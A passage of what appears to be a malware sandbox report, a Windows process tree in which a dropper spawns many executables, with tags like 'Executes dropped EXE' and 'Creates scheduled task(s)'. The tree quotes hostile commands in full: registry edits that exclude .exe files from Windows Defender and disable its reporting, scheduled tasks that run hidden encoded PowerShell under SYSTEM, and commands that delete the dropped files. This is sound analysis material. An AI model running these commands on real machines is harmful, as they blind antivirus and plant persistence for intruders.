        PID:4116
  - - C:\Users\Admin\AppData\Local\Temp\IXP015.TMP\2va1121.exe
      C:\Users\Admin\AppData\Local\Temp\IXP015.TMP\2va1121.exe
      4⤵
      PID:1328
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        5⤵
        
        PID:2976
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2976 -s 560
        6⤵
        Program crash
        
        PID:4080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5108 --field-trial-handle=1872,i,6608022948431176349,11435806210995001477,131072 /prefetch:8
  2⤵
  PID:4760
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5228 --field-trial-handle=1872,i,6608022948431176349,11435806210995001477,131072 /prefetch:8
  2⤵
  PID:3264
- C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe
  "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --reenable-autoupdates --system-level
  2⤵
  PID:4764
- - C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe
    "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x254,0x258,0x25c,0x230,0x260,0x7ff605447688,0x7ff605447698,0x7ff6054476a8
    3⤵
    PID:4784
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5284 --field-trial-handle=1872,i,6608022948431176349,11435806210995001477,131072 /prefetch:1
  2⤵
  PID:3200
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4884 --field-trial-handle=1872,i,6608022948431176349,11435806210995001477,131072 /prefetch:1
  2⤵
  PID:2944
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3760 --field-trial-handle=1872,i,6608022948431176349,11435806210995001477,131072 /prefetch:1
  2⤵
  PID:1524
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4588 --field-trial-handle=1872,i,6608022948431176349,11435806210995001477,131072 /prefetch:8
  2⤵
  PID:1068
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5576 --field-trial-handle=1872,i,6608022948431176349,11435806210995001477,131072 /prefetch:8
  2⤵
  - Modifies registry class
  PID:4832
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1832 --field-trial-handle=1872,i,6608022948431176349,11435806210995001477,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:540

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:5064

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:248

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5052
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb577646f8,0x7ffb57764708,0x7ffb57764718
  2⤵
  PID:1368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,8855636031404140156,14037249592735901857,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2
  2⤵
  PID:1544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,8855636031404140156,14037249592735901857,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,8855636031404140156,14037249592735901857,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2920 /prefetch:8
  2⤵
  PID:4720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,8855636031404140156,14037249592735901857,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
  2⤵
  PID:2512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,8855636031404140156,14037249592735901857,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
  2⤵
  PID:1364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,8855636031404140156,14037249592735901857,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:1
  2⤵
  PID:2012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,8855636031404140156,14037249592735901857,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:1
  2⤵
  PID:3456
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,8855636031404140156,14037249592735901857,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3848 /prefetch:8
  2⤵
  PID:5472
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,8855636031404140156,14037249592735901857,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3848 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,8855636031404140156,14037249592735901857,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1
  2⤵
  PID:5872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,8855636031404140156,14037249592735901857,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:1
  2⤵
  PID:5948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,8855636031404140156,14037249592735901857,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1
  2⤵
  PID:6108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,8855636031404140156,14037249592735901857,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5152 /prefetch:1
  2⤵
  PID:6096
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,8855636031404140156,14037249592735901857,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5988 /prefetch:1
  2⤵
  PID:412
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,8855636031404140156,14037249592735901857,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5956 /prefetch:1
  2⤵
  PID:4296

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:352

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4528

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5164

C:\Users\Admin\Desktop\New Text Document.exe
"C:\Users\Admin\Desktop\New Text Document.exe"
1⤵
PID:5720
- C:\Users\Admin\Desktop\a\123.exe
  "C:\Users\Admin\Desktop\a\123.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4988
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    3⤵
    - Drops startup file
    PID:1048
  - - C:\Users\Admin\Pictures\A9N42EwNPYiI3lwCJHLhVAsU.exe
      "C:\Users\Admin\Pictures\A9N42EwNPYiI3lwCJHLhVAsU.exe"
      4⤵
      Executes dropped EXE
      PID:5692
    - - C:\Users\Admin\AppData\Local\Temp\Broom.exe
        
        C:\Users\Admin\AppData\Local\Temp\Broom.exe
        5⤵
        
        PID:6260
  - - C:\Users\Admin\Pictures\NpAc7jfFe9my09gG7KFVoWfW.exe
      "C:\Users\Admin\Pictures\NpAc7jfFe9my09gG7KFVoWfW.exe"
      4⤵
      Executes dropped EXE
      PID:3128
    - - C:\Users\Admin\AppData\Local\Temp\is-4SNS1.tmp\NpAc7jfFe9my09gG7KFVoWfW.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-4SNS1.tmp\NpAc7jfFe9my09gG7KFVoWfW.tmp" /SL5="$304DE,3023043,224768,C:\Users\Admin\Pictures\NpAc7jfFe9my09gG7KFVoWfW.exe"
        5⤵
        
        PID:6236
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /Delete /F /TN "TAC1028-1"
        6⤵
        
        PID:6148
      - C:\Program Files (x86)\TAudioConverter\TAudioConverter.exe
        
        "C:\Program Files (x86)\TAudioConverter\TAudioConverter.exe" -i
        6⤵
        
        PID:6180
      - C:\Program Files (x86)\TAudioConverter\TAudioConverter.exe
        
        "C:\Program Files (x86)\TAudioConverter\TAudioConverter.exe" -s
        6⤵
        
        PID:6644
  - - C:\Users\Admin\Pictures\xCqqqTLBzqOpFcrZ3Ai4GZqL.exe
      "C:\Users\Admin\Pictures\xCqqqTLBzqOpFcrZ3Ai4GZqL.exe"
      4⤵
      Executes dropped EXE
      PID:5584
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\xCqqqTLBzqOpFcrZ3Ai4GZqL.exe" & exit
        5⤵
        
        PID:6984
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        6⤵
        Delays execution with timeout.exe
        
        PID:184
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 1576
        5⤵
        Program crash
        
        PID:3500
  - - C:\Users\Admin\Pictures\qkHyNRsdl9IdB0bvVoiF34Rx.exe
      "C:\Users\Admin\Pictures\qkHyNRsdl9IdB0bvVoiF34Rx.exe"
      4⤵
      PID:4516
  - - C:\Users\Admin\Pictures\vVFQCaJCYZaH7afbkOykWuDH.exe
      "C:\Users\Admin\Pictures\vVFQCaJCYZaH7afbkOykWuDH.exe" --silent --allusers=0
      4⤵
      PID:2352
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\vVFQCaJCYZaH7afbkOykWuDH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\vVFQCaJCYZaH7afbkOykWuDH.exe" --version
        5⤵
        
        PID:7000
    - - C:\Users\Admin\Pictures\vVFQCaJCYZaH7afbkOykWuDH.exe
        
        C:\Users\Admin\Pictures\vVFQCaJCYZaH7afbkOykWuDH.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=104.0.4944.33 --initial-client-data=0x2fc,0x300,0x304,0x2d8,0x308,0x6f015648,0x6f015658,0x6f015664
        5⤵
        
        PID:6552
    - - C:\Users\Admin\Pictures\vVFQCaJCYZaH7afbkOykWuDH.exe
        
        "C:\Users\Admin\Pictures\vVFQCaJCYZaH7afbkOykWuDH.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2352 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231028163313" --session-guid=c044bb43-1708-41f9-9bff-963a2431c43c --server-tracking-blob=YmVhZjI3OWJjNjZiZjA5MWJjNjRiN2FmNzkyZTIyMDEzMDU0NjA3NWEyMjc4NWQzMjA2NTk1OWIyMTE4ZmY2ODp7ImNvdW50cnkiOiJOTCIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTY5ODUxMDc3Ni43OTkxIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI5YzE1N2UyMS05NDU0LTQyNWItYjJkZi1mZTkxMDBhYWNiNjMifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=5405000000000000
        5⤵
        
        PID:6112
      - C:\Users\Admin\Pictures\vVFQCaJCYZaH7afbkOykWuDH.exe
        
        C:\Users\Admin\Pictures\vVFQCaJCYZaH7afbkOykWuDH.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=104.0.4944.33 --initial-client-data=0x308,0x30c,0x310,0x2d8,0x314,0x6d2e5648,0x6d2e5658,0x6d2e5664
        6⤵
        
        PID:5800
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310281633131\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310281633131\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe"
        5⤵
        
        PID:7232
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310281633131\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310281633131\assistant\assistant_installer.exe" --version
        5⤵
        
        PID:1636
  - - C:\Users\Admin\Pictures\M6h08RBAR8UBFravGuaCZohJ.exe
      "C:\Users\Admin\Pictures\M6h08RBAR8UBFravGuaCZohJ.exe"
      4⤵
      PID:3320
  - - C:\Users\Admin\Pictures\cjSwL8rdMCsbJWCJFrYHEw2X.exe
      "C:\Users\Admin\Pictures\cjSwL8rdMCsbJWCJFrYHEw2X.exe"
      4⤵
      PID:5636
    - - C:\Users\Admin\AppData\Local\Temp\7zSB0E2.tmp\Install.exe
        
        .\Install.exe
        5⤵
        
        PID:6864
      - C:\Users\Admin\AppData\Local\Temp\7zSCDF0.tmp\Install.exe
        
        .\Install.exe /adidL "385118" /S
        6⤵
        
        PID:5828
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        7⤵
        
        PID:6060
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        8⤵
        
        PID:2852
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        9⤵
        
        PID:5888
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        9⤵
        
        PID:5320
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        7⤵
        
        PID:6928
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        8⤵
        
        PID:3772
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        9⤵
        
        PID:5216
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        9⤵
        
        PID:4136
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gTZkGLGyG" /SC once /ST 00:45:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        7⤵
        Creates scheduled task(s)
        
        PID:1476
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gTZkGLGyG"
        7⤵
        
        PID:5272
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gTZkGLGyG"
        7⤵
        
        PID:6968
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bsxbnVOyALBYOoKnMh" /SC once /ST 16:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qFlLvwsJSrNNJIEdB\VntZkdGCrMlsdQW\Dfvcjzo.exe\" pg /TFsite_idvHB 385118 /S" /V1 /F
        7⤵
        Creates scheduled task(s)
        
        PID:5756
  - - C:\Users\Admin\Pictures\ecS5Gk7r3Xg9ncBd56LLLcw0.exe
      "C:\Users\Admin\Pictures\ecS5Gk7r3Xg9ncBd56LLLcw0.exe"
      4⤵
      PID:6708
  - - C:\Users\Admin\Pictures\6BVbmmSpr4B03bav3pDt64Mo.exe
      "C:\Users\Admin\Pictures\6BVbmmSpr4B03bav3pDt64Mo.exe"
      4⤵
      Executes dropped EXE
      PID:6012
    - - C:\Users\Admin\Pictures\6BVbmmSpr4B03bav3pDt64Mo.exe
        
        "C:\Users\Admin\Pictures\6BVbmmSpr4B03bav3pDt64Mo.exe"
        5⤵
        
        PID:6572
  - - C:\Users\Admin\Pictures\9AxfuWmirL0COACqXNCBhFLU.exe
      "C:\Users\Admin\Pictures\9AxfuWmirL0COACqXNCBhFLU.exe"
      4⤵
      Executes dropped EXE
      PID:5472
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\0393091978.exe"
        5⤵
        
        PID:2624
      - C:\Users\Admin\AppData\Local\Temp\0393091978.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0393091978.exe"
        6⤵
        
        PID:3340
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "9AxfuWmirL0COACqXNCBhFLU.exe" /f & erase "C:\Users\Admin\Pictures\9AxfuWmirL0COACqXNCBhFLU.exe" & exit
        5⤵
        
        PID:6352
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "9AxfuWmirL0COACqXNCBhFLU.exe" /f
        6⤵
        Kills process with taskkill
        
        PID:4980
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5472 -s 1436
        5⤵
        Program crash
        
        PID:6668
  - - C:\Users\Admin\Pictures\24pd8fLTxjJ7eGirzhHTRQSA.exe
      "C:\Users\Admin\Pictures\24pd8fLTxjJ7eGirzhHTRQSA.exe"
      4⤵
      Executes dropped EXE
      PID:5468
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:3548
- C:\Users\Admin\Desktop\a\salo.exe
  "C:\Users\Admin\Desktop\a\salo.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5816
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:2020
- C:\Users\Admin\Desktop\a\audiodgse.exe
  "C:\Users\Admin\Desktop\a\audiodgse.exe"
  2⤵
  - Executes dropped EXE
  PID:5264
- - C:\Users\Admin\Desktop\a\audiodgse.exe
    "C:\Users\Admin\Desktop\a\audiodgse.exe"
    3⤵
    PID:7120
- C:\Users\Admin\Desktop\a\EasySup.exe
  "C:\Users\Admin\Desktop\a\EasySup.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:6048
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6048 -s 780
    3⤵
    - Program crash
    PID:5828
- C:\Users\Admin\Desktop\a\sbinzx.exe
  "C:\Users\Admin\Desktop\a\sbinzx.exe"
  2⤵
  - Executes dropped EXE
  PID:4528
- - C:\Users\Admin\Desktop\a\sbinzx.exe
    "C:\Users\Admin\Desktop\a\sbinzx.exe"
    3⤵
    PID:7092
- C:\Users\Admin\Desktop\a\updates_installer.exe
